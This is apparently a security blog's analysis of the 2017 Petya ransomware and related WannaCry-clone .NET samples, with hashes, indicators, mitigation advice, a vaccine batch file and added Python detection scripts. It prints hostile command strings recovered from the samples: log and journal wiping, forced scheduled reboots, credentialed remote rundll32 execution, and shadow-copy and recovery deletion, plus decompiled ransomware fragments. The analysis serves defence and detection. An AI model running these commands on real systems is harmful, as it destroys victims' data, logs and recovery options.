After the WannaCry ransomware attack, Petya ransomware has arrived with a new
wave of attacks. This ransomware campaign is currently taking place and has
already impacted companies in countries across the world including Ukraine,
Spain, Russia, the Netherlands, France and India. Industries we are aware of
that have already been hit by this cyber-attack include the telecommunications,
banking, transportation, life sciences, food & beverage, and power &
utilities sectors.
The criminals behind the ransomware are requesting a ransom of USD 300 in
bitcoin, reportedly to be paid within three days, or else all files on the
computer will be deleted (see screenshot below).
Possible mode of entry:
The reported spreading mechanism of this Petya variant is email spam in the
form of booby-trapped Office documents. These documents use the CVE-2017-0199
Office RTF vulnerability to download the installer, which then runs an SMB
worm component that spreads like WannaCry ransomware.
The description given for this CVE is:
Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013
SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008
SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary
code via a crafted document, aka "Microsoft Office/WordPad Remote Code
Execution Vulnerability w/Windows API."
In general terms the description is execution of arbitrary code by remote
attackers using a crafted document; "remote attackers" here means the mode of
entry is email spam. We received samples for analysis and based on our analysis
we made the following findings.
Sample: SHA 256: 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
This sample is already well known, as many researchers have published their
opinions on it. So while doing our manual analysis we also found automated
analysis reports on the online platforms. The sample is a DLL file, so we chose
to continue our manual analysis. During the analysis we received another DLL
sample:
SHA 256: 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
We compared the compilation timestamps of the two samples and found them to be
very close.
The file properties are almost identical, and checking the imported libraries
confirmed it: both files show the same behaviour. The imported DLLs are:
crypt32.dll    Crypto API32
iphlpapi.dll   IP Helper API
ws2_32.dll     Windows Socket 2.0 32-Bit DLL
mpr.dll        Multiple Provider Router DLL
netapi32.dll   Net Win32 API DLL
dhcpsapi.dll   DHCP Server API Stub DLL
The DLLs above are used by the ransomware sample during encryption, network
enumeration, lateral movement, etc. Our interest went to the Crypto API
(crypt32.dll), from which the sample imports CryptBinaryToStringW,
CryptStringToBinaryW and CryptDecodeObjectEx. The first two convert between
byte arrays and formatted strings (for example base64), and the third decodes
an encoded structure such as a DER public key. Looking further into the strings
of the file, we noticed the following encryption related strings (CryptoAPI
key-handling functions; since they show up as strings rather than imports, the
sample most likely resolves them at run time):
· CryptReleaseContext
· CryptAcquireContext
· CryptGenRandom
· CryptExportKey
· CryptAcquireContext
· CryptSetKeyParam
· CryptImportKey
· CryptEncrypt
· CryptGenKey
· CryptDestroyKey
After that we looked into some very interesting strings:
· .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xls
· Microsoft Enhanced RSA and AES Cryptographic Provider
· README.TXT
· kernel32.dll
· iphlpapi.dll
· 127.0.0.1
· SeTcbPrivilege
· SeShutdownPrivilege
· SeDebugPrivilege
· ComSpec
· \cmd.exe
· wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
· dllhost.dat
· wbem\wmic.exe
· process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
Since this is a plain (non-COM) DLL, it has to be loaded by a host process such
as rundll32.exe, which calls one of its exports (ordinal #1 here). No ordinary
user is going to run rundll32.exe against a DLL by hand; DLLs are normally
loaded by a parent executable. Looking into the code and the strings, we can
see the rundll32.exe invocation and where our sample is stored (columns: file
offset, virtual address, string):
· 00000001338C  00001001418C  0  ComSpec
· 00000001339C  00001001419C  0  \cmd.exe
· 0000000133B0  0000100141B0  0  wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
· 0000000134A8  0000100142A8  0  schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
· 000000013520  000010014320  0  at %02d:%02d %ws
· 000000013544  000010014344  0  shutdown.exe /r /f
· 00000001356C  00001001436C  0  /RU "SYSTEM"
· 00000001358C  00001001438C  0  dllhost.dat
· 0000000135FB  0000100143FB  0  u%s \\%s -accepteula -s
· 000000013630  000010014430  0  -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
· 0000000136A0  0000100144A0  0  wbem\wmic.exe
· 0000000136C0  0000100144C0  0  %s /node:"%ws" /user:"%ws" /password:"%ws"
· 000000013718  000010014518  0  process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
· 0000000137B4  0000100145B4  0  \\%s\admin$
· 0000000137CC  0000100145CC  0  \\%ws\admin$\%ws
· 000000015468  000010016C68  0  c:\Windows\
· 000000015480  000010016C80  0  rundll32.exe
· 000000016CD0  0000100184D0  0  rundll32.exe
· 000000016CF0  0000100184F0  0  c:\Windows\
In the strings above we can clearly see a process call create that launches
rundll32.exe (by its full path), which in turn points at a file under the
Windows directory. On its own this does not confirm whether the file to be
executed is this sample or some other file. So I copied the DLL to the Windows
folder and executed the following command:
rundll32.exe <sample name.dll> #1
After that step I went back to the code of the DLL and found the following:
So there is a connection between the file execution, schtasks and
shutdown.exe. After executing the DLL we saw that a scheduled task had been
added. It created At1, scheduled for exactly one hour after the creation of the
task. Our guess was that it is for the shutdown call we saw in the previous
screenshot.
Our analysis was correct: the scheduled task actually reboots the system.
After the restart it boots into the ransom note page:
So we cannot access our files; they are encrypted. Payment instructions, the
bitcoin wallet details and a blinking prompt to enter the purchased key are
shown. We typed some random text and it threw an incorrect key error.
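The strings listing above is only complete if you look for both narrow and wide strings: command templates with %ws specifiers, such as the schtasks and wmic lines, are likely stored as UTF-16LE in the image, and a plain ASCII strings run skips those. As an added example that is not part of the original post, the Python below scans a file image for the indicator strings taken from the listing in both encodings and reports which ones were present only in wide form. The blob it scans is constructed inside the code for offline testing and is not the real sample.

```python
import re

# Indicator strings copied from the strings listing above. The %s / %ws / %c
# format specifiers are left in place because that is how they sit in the file.
INDICATORS = {
    "event_log_wipe": "wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D",
    "scheduled_reboot": "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d",
    "forced_reboot": "shutdown.exe /r /f",
    "psexec_style_exec": "-accepteula -s",
    "rundll32_ordinal_1": "-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1",
    "wmic_remote_exec": "process call create \"C:\\Windows\\System32\\rundll32.exe",
    "admin_share": "\\\\%ws\\admin$\\%ws",
    "dropped_psexec_name": "dllhost.dat",
    "csp_name": "Microsoft Enhanced RSA and AES Cryptographic Provider",
}


def needles(text):
    """Yield (encoding, bytes) pairs: the narrow and the wide form of one indicator."""
    yield "ascii", text.encode("ascii")
    yield "utf-16le", text.encode("utf-16-le")


def scan(data):
    """Return {indicator: [(encoding, offset), ...]} for every occurrence found."""
    hits = {}
    for name, text in INDICATORS.items():
        for enc, needle in needles(text):
            start = 0
            while True:
                off = data.find(needle, start)
                if off == -1:
                    break
                hits.setdefault(name, []).append((enc, off))
                start = off + 1
    return hits


def wide_only(hits):
    """Indicators present only as UTF-16LE: an ASCII-only strings run misses these."""
    return sorted(name for name, occ in hits.items()
                  if all(enc == "utf-16le" for enc, _ in occ))


def constructed_sample():
    """Constructed test blob (not the real sample): three wide strings, one narrow."""
    pad = b"\x00" * 16
    return (b"MZ" + pad
            + "shutdown.exe /r /f".encode("utf-16-le") + pad
            + (INDICATORS["event_log_wipe"] + " %c:").encode("utf-16-le") + pad
            + b"dllhost.dat" + pad
            + "\\\\%ws\\admin$\\%ws".encode("utf-16-le") + pad)


if __name__ == "__main__":
    found = scan(constructed_sample())
    for name, occ in sorted(found.items()):
        print(name, occ)
    print("wide only:", wide_only(found))
```

To run it against a real file, pass the bytes of the DLL to scan(); with GNU strings the equivalent manual check is `strings -e l file` for the 16-bit little-endian strings alongside the default run.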
Email address associated with this ransomware:
wowsmith123456(@)posteo(.)net
Current status of this email address:
Posteo is an email service provider offering paid email accounts. In this Petya
case the attackers used a Posteo address as the contact option. Posteo's abuse
team checked it and blocked that contact address.
Hence paying the ransom gives no assurance that a victim will receive the
decryption key from the attackers: they can no longer be contacted at that
email address.
We collected the associated domains and IPs for detection purposes with this
post.
Ransomware spreading URLs:
· benkow(.)cc
· Coffeinoffice(.)xyz
· french-cooking(.)com
· sundanders(.)online
· casconut(.)xyz
· blumbeerg(.)xyz
· insurepol(.)in
· whitefoam(.)org(.)uk
· xfusion(.)co(.)uk
· affliates(.)in
· hyporus(.)in
· dantan(.)club
· kababmachatu(.)xyz
· damodot(.)xyz
· ballotvize(.)xyz
Bitcoin address: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
C&C payment servers:
· mischapuk6hyrn72(.)onion/
· petya3jxfp2f7g3i(.)onion/
· petya3sen7dyko2n(.)onion/
· mischa5xyix2mrhd(.)onion/MZ2MMJ
· mischapuk6hyrn72(.)onion/MZ2MMJ
· petya3jxfp2f7g3i(.)onion/MZ2MMJ
· petya3sen7dyko2n(.)onion/MZ2MMJ
Possible IP addresses:
· 185.165(.)29(.)78
· 84.200(.)16(.)242
· 111.90(.)139(.)247
· 95.141(.)115(.)108
· 89.146(.)220(.)134
Action steps:
Detection rules (Snort, YARA) for this Petya variant are available from
independent sources on the net; apply those rules in order to detect this
ransomware. Blocking the spreading domains and IPs above in the firewall and
proxy cuts off the campaign's delivery infrastructure. We recommend blocking
SMB and RDP (Remote Desktop Protocol) access to all computers from the
internet: ports 445 and 139 for SMB and 3389 for RDP. Ensure that all Windows
systems are patched with the latest security updates, especially MS17-010.
Note that the wmic /node ... /user ... /password and \\%ws\admin$ strings above
show that this sample also spreads inside the network with stolen credentials
over WMI and the admin$ share, so patching MS17-010 alone does not stop lateral
movement; limit shared local administrator accounts and restrict SMB between
workstations where possible.
A Petya vaccine is available as a batch file from Bleeping Computer, or you
can copy the following batch file and save it as .bat. It works because this
variant checks for a file with its own name in C:\Windows before running; it
does not protect against other ransomware or a variant using a different file
name:
@echo off
REM Administrative check from here: https://stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights
REM Vaccination discovered by twitter.com/0xAmit/status/879778335286452224
REM Batch file created by Lawrence Abrams of BleepingComputer.com. @bleepincomputer @lawrenceabrams
echo Administrative permissions required. Detecting permissions...
echo.
net session >nul 2>&1
if %errorLevel% == 0 (
if exist C:\Windows\perfc (
echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
echo.
) else (
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat
attrib +R C:\Windows\perfc
attrib +R C:\Windows\perfc.dll
attrib +R C:\Windows\perfc.dat
echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
echo.
)
) else (
echo Failure: You must run this batch file as Administrator.
)
pause
Further attack wave in Ukraine:
While writing this analysis report we came to know about WannaCry-clone
attacks happening in Ukraine. We got three samples for analysis:
Sample1: MD5: 0BDE638B274C7F9C6C356D3987ED1A2D
Sample2: MD5: 87BE992695B752D86AEAB1116EB5393F
Sample3: MD5: 5C7C894A1CCFD8C8E0F174B0149A6601
All three samples are .NET compiled files.
Reversing the samples for analysis:
These samples appear to have been compiled on Jan 1 2016, but when we searched
the hashes on VirusTotal they had only been uploaded a couple of days earlier.
So they are actually new samples, and the compile timestamp seems to have been
customised or modified by the malware author.
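Both timestamp observations in this post (the two Petya DLLs whose compile times nearly match, and these .NET samples stamped Jan 1 2016 but first seen on VirusTotal days ago) come from the COFF TimeDateStamp in the PE header. As an added example that is not part of the original post, the Python below reads that field with the standard library and applies the two checks. The minimal PE image it is run on is constructed in the code, and the one hour build window and 180 day backdating slack are assumed thresholds, not values from the samples.

```python
import struct
from datetime import datetime, timedelta, timezone


def pe_timestamp(data):
    """Read the COFF TimeDateStamp of a PE image (bytes) as a UTC datetime.

    Layout: 'MZ' at offset 0; e_lfanew (DWORD at 0x3C) points to 'PE\\0\\0';
    the 20-byte COFF file header follows and TimeDateStamp is its DWORD at
    offset 4 (after Machine and NumberOfSections), i.e. e_lfanew + 8.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def utc(year, month, day):
    """Small helper so callers can build aware dates without importing datetime."""
    return datetime(year, month, day, tzinfo=timezone.utc)


def same_build_window(a, b, window=timedelta(hours=1)):
    """True when two images were stamped within `window` of each other (assumed threshold)."""
    return abs(a - b) <= window


def backdated(stamp, first_seen, slack=timedelta(days=180)):
    """Heuristic: a stamp far older than the first public sighting is suspicious.

    The field is linker-written and trivially editable, so treat it as a hint.
    """
    return first_seen - stamp > slack


def constructed_image(stamp):
    """Constructed minimal MZ/PE header for offline testing (not a real sample)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header right after the DOS header
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, stamp, 0, 0, 0, 0x2102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    old = pe_timestamp(constructed_image(1451606400))   # 2016-01-01 00:00:00 UTC
    print("compiled:", old, "backdated:", backdated(old, utc(2017, 6, 27)))
```

Use the stamp as a pivot for clustering related builds rather than as proof of age: it is attacker controlled, and some .NET toolchains emit fixed or hash-derived values instead of the real build time.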
Sample one contains WannaCry strings inside its code. We manually checked the
other two samples and they carry the same strings. We successfully recovered
the code of these samples.
The decompiled program is shown below:
using System;
using System.Collections.Generic;
using System.IO;

internal class Program
{
    public static string DEMO_KEY_PRIVATE =
        "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";
    public static string DEMO_KEY_PUBLIC =
        "BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3";
    public static string DEMO_EXTENSIONS = "jpg,jpeg,png,tif,gif,bmp";
    public static string ENCRYPTION_TOOL_FNAME = "ed.exe";
    public static string ENCRYPTED_PRIVATE_KEY_FNAME = "key.encrypted";
    public static string[] ALL_EXTENSIONS = new string[]
    {
        "doc,docx,xls,xlsx,ppt,pptx,pst,ost,msg,eml",
        "vsd,vsdx,txt,csv,rtf,123,wks,wk1,pdf,dwg",
        "onetoc2,snt,docb,docm,dot,dotm,dotx,xlsm,xlsb,xlw",
        "xlt,xlm,xlc,xltx,xltm,pptm,pot,pps,ppsm,ppsx",
        "ppam,potx,potm,edb,hwp,602,sxi,sti,sldx,sldm",
        "sldm,vdi,vmdk,vmx,gpg,aes,ARC,PAQ,bz2,tbk",
        "bak,tar,tgz,gz,7z,rar,zip,backup,iso,vcd",
        "raw,cgm,tiff,nef,psd,ai,svg,djvu,m4u,m3u",
        "mid,wma,flv,3g2,mkv,3gp,mp4,mov,avi,asf",
        "mpeg,vob,mpg,wmv,fla,swf,wav,mp3,sh,class",
        "jar,java,rb,asp,php,jsp,brd,sch,dch,dip",
        "pl,vb,vbs,ps1,bat,cmd,js,asm,h,pas",
        "cpp,c,cs,suo,sln,ldf,mdf,ibd,myi,myd",
        "frm,odb,dbf,db,mdb,accdb,sql,sqlitedb,sqlite3,asc",
        "lay6,lay,mml,sxm,otg,odg,uop,std,sxd,otp",
        "odp,wb2,slk,dif,stc,sxc,ots,ods,3dm,max",
        "3ds,uot,stw,sxw,ott,odt,pem,p12,csr,crt,key,pfx,der"
    };

    // Enumerate fixed, removable and network drives.
    public static List<string> ListDrives()
    {
        DriveInfo[] arg_0B_0 = DriveInfo.GetDrives();
        List<string> list = new List<string>();
        DriveInfo[] array = arg_0B_0;
        for (int i = 0; i < array.Length; i++)
        {
            DriveInfo driveInfo = array[i];
            if (driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType == DriveType.Removable || driveInfo.DriveType == DriveType.Network)
            {
                list.Add(driveInfo.Name);
            }
        }
        return list; // the decompiled excerpt stopped inside the loop; return and closing braces added
    }
}
The above code snippet deals with the keys, the file extensions targeted and
the name of the encryption tool (ed.exe). We moved on to the next sample, which
contains resources in the form of images for the bitcoin details and the ransom
note:
internal static Bitmap wannacry
{
    get
    {
        return (Bitmap)Resources.ResourceManager.GetObject("wannacry", Resources.resourceCulture);
    }
}
Now we move on to our final sample. The code is very interesting:
// ed.CryptoFile
private static string[] _exProcesses = new string[]
{
"lsm.exe",
"csrss.exe",
"dwm.exe",
"smss.exe",
"lsass.exe",
"wuauclt.exe",
"services.exe",
"svchost.exe",
"taskhost.exe",
"winlogon.exe",
"wininit.exe",
"conhost.exe",
"explorer.exe",
"spoolss.exe",
"spoolsv.exe",
"system.exe",
"avp.exe",
"avpui.exe",
"ekrn.exe",
"egui.exe",
"mfemmc.exe",
"mfefire.exe",
"mfevtps.exe",
"pefservice.exe",
"mcsvhost.exe",
"msascui.exe",
"msmpeng.exe",
"mpcmdrun.exe",
"avshadow.exe",
"avguard.exe",
"avgnt.exe"
};
This list names core Windows processes and the main executables of several
anti-malware products (Kaspersky avp.exe, ESET ekrn.exe/egui.exe, McAfee
mfe*.exe, Windows Defender msmpeng.exe/msascui.exe, Avira avguard.exe/avgnt.exe),
so the sample knows which security products may be present on the system.
Given the field name _exProcesses and the KillFileLockProcess helper shown
below, it is most likely an exclusion list: processes the sample will not try
to kill when a file it wants to encrypt is locked. Further on we see the AES
related code:
using (AesManaged aesManaged = new AesManaged())
{
    aesManaged.Mode = CipherMode.CBC;
    aesManaged.KeySize = 256;
    aesManaged.Key = key;
    aesManaged.IV = iv;
    // remainder of the method not shown
}
We shortened the CryptoFile class to its signatures in the following snippet.
CRYPT_BYTES is 5242880 (5 MiB), which suggests that only the first 5 MiB of
each file is encrypted, and the key blob parameters show the per-file key
material is protected with the RSA public key from the first sample:
public static class CryptoFile
{
    public static long CRYPT_BYTES = 5242880L;   // 5 MiB
    private static bool KillFileLockProcess(string path);
    public static bool Encrypt(string path, byte[] publicKeyBlob);
    public static bool Decrypt(string path, byte[] privateKeyBlob);
}
It also contains code to delete volume shadow copies and disable Windows
recovery, triggered by the -delshadowcopies argument:
if (!(text == "-delshadowcopies"))
{
    goto IL_52B;
}
PS.ExecuteAndForget("cmd.exe",
    "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet");
goto IL_52B;
}
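The command lines recovered from both families in this post (the Petya DLL's wevtutil/fsutil log wipe, schtasks/at plus shutdown.exe /r /f, wmic /node ... process call create rundll32 ... #1, the PsExec-style -accepteula -s -d rundll32 launch, and this .NET sample's -delshadowcopies command) are exactly what process-creation telemetry records. As an added example that is not part of the original post, the Python below runs those patterns over a few constructed process-creation records and flags hosts that show both remote rundll32 execution and log or recovery tampering. The log format, hostnames, IPs, credentials and the perfc.dat/dllhost.dat paths in the records are constructed for the example.

```python
import re

# Constructed process-creation records: "<utc time>\t<host>\t<parent image>\t<command line>".
# A Sysmon Event ID 1 or Security 4688 export carries the same fields.
SAMPLE_LOG = "\n".join([
    "2017-06-27T10:12:01Z\tWS01\tC:\\Windows\\System32\\rundll32.exe\t"
    "cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:",
    "2017-06-27T10:12:02Z\tWS01\tC:\\Windows\\System32\\rundll32.exe\t"
    "schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 11:12",
    "2017-06-27T10:12:05Z\tWS01\tC:\\Windows\\System32\\rundll32.exe\t"
    "wmic.exe /node:\"10.0.0.7\" /user:\"CORP\\admin\" /password:\"Passw0rd\" "
    "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1\"",
    "2017-06-27T10:12:06Z\tWS01\tC:\\Windows\\System32\\rundll32.exe\t"
    "C:\\Windows\\dllhost.dat \\\\10.0.0.8 -accepteula -s -d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\",#1",
    "2017-06-27T10:40:00Z\tWS02\tC:\\Users\\bob\\Downloads\\ed.exe\t"
    "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & "
    "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet",
    "2017-06-27T10:41:00Z\tWS03\tC:\\Windows\\explorer.exe\t"
    "\"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\bob\\report.docx\"",
    "2017-06-27T10:42:00Z\tWS03\tC:\\Windows\\System32\\cmd.exe\tschtasks /Query /FO LIST",
])

# (rule name, regex over the command line); patterns follow the strings shown on this page.
RULES = [
    ("petya_event_log_wipe", re.compile(r"wevtutil\s+cl\s+(Setup|System|Security|Application)\b.*fsutil\s+usn\s+deletejournal", re.I)),
    ("petya_usn_journal_delete", re.compile(r"fsutil\s+usn\s+deletejournal\s+/D\s+[a-z]:", re.I)),
    ("petya_scheduled_reboot", re.compile(r"(schtasks.*/Create.*/SC\s+once.*shutdown\.exe\s+/r\s+/f|^at(\.exe)?\s+\d{1,2}:\d{2}\s+.*shutdown\.exe\s+/r\s+/f)", re.I)),
    ("petya_wmic_remote_rundll32", re.compile(r"wmic(\.exe)?\s+/node:\S+\s+/user:\S+\s+/password:\S+\s+process\s+call\s+create\s+.*rundll32\.exe.*#1", re.I)),
    ("petya_psexec_rundll32", re.compile(r"-accepteula\s+-s\s+-d\s+C:\\Windows\\System32\\rundll32\.exe\s+\"C:\\Windows\\[^\"]+\",#1", re.I)),
    ("dotnet_shadow_copy_wipe", re.compile(r"vssadmin\s+delete\s+shadows\s+/all\s+/quiet|wmic\s+shadowcopy\s+delete|bcdedit\s+/set\s+\{default\}\s+recoveryenabled\s+no|wbadmin\s+delete\s+catalog", re.I)),
]


def parse(log_text):
    """Yield one dict per non-empty record; the command line may itself contain tabs-free spaces only."""
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        ts, host, parent, cmd = line.split("\t", 3)
        yield {"line": n, "time": ts, "host": host, "parent": parent, "cmd": cmd}


def detect(log_text):
    """Return [(line number, host, rule name)] for every record that matches a rule."""
    hits = []
    for rec in parse(log_text):
        for name, rx in RULES:
            if rx.search(rec["cmd"]):
                hits.append((rec["line"], rec["host"], name))
    return hits


def hosts_with_lateral_movement(hits):
    """Hosts that both launched rundll32 remotely and tampered with logs or recovery."""
    by_host = {}
    for _, host, name in hits:
        by_host.setdefault(host, set()).add(name)
    return sorted(host for host, names in by_host.items()
                  if {"petya_wmic_remote_rundll32", "petya_psexec_rundll32"} & names
                  and {"petya_event_log_wipe", "dotnet_shadow_copy_wipe"} & names)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("lateral movement on:", hosts_with_lateral_movement(found))
```

To use it on real data, point parse() at an export with the same four columns (Sysmon CommandLine or the 4688 Process Command Line field); the rundll32 ordinal and wevtutil patterns are specific enough to alert on individually, while the shadow-copy rule is shared with many other ransomware families and is best correlated with the parent image.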
Conclusion
The recent ransomware campaigns give numerous indications that they may be the
work of organised threat actors or state-sponsored attackers. Ukraine was
specifically targeted in the last couple of weeks. Proper countermeasures,
periodic patching, timely assessment of host and network compromise and regular
vulnerability assessments can put an organisation on the safer side.
Post made by
newWorld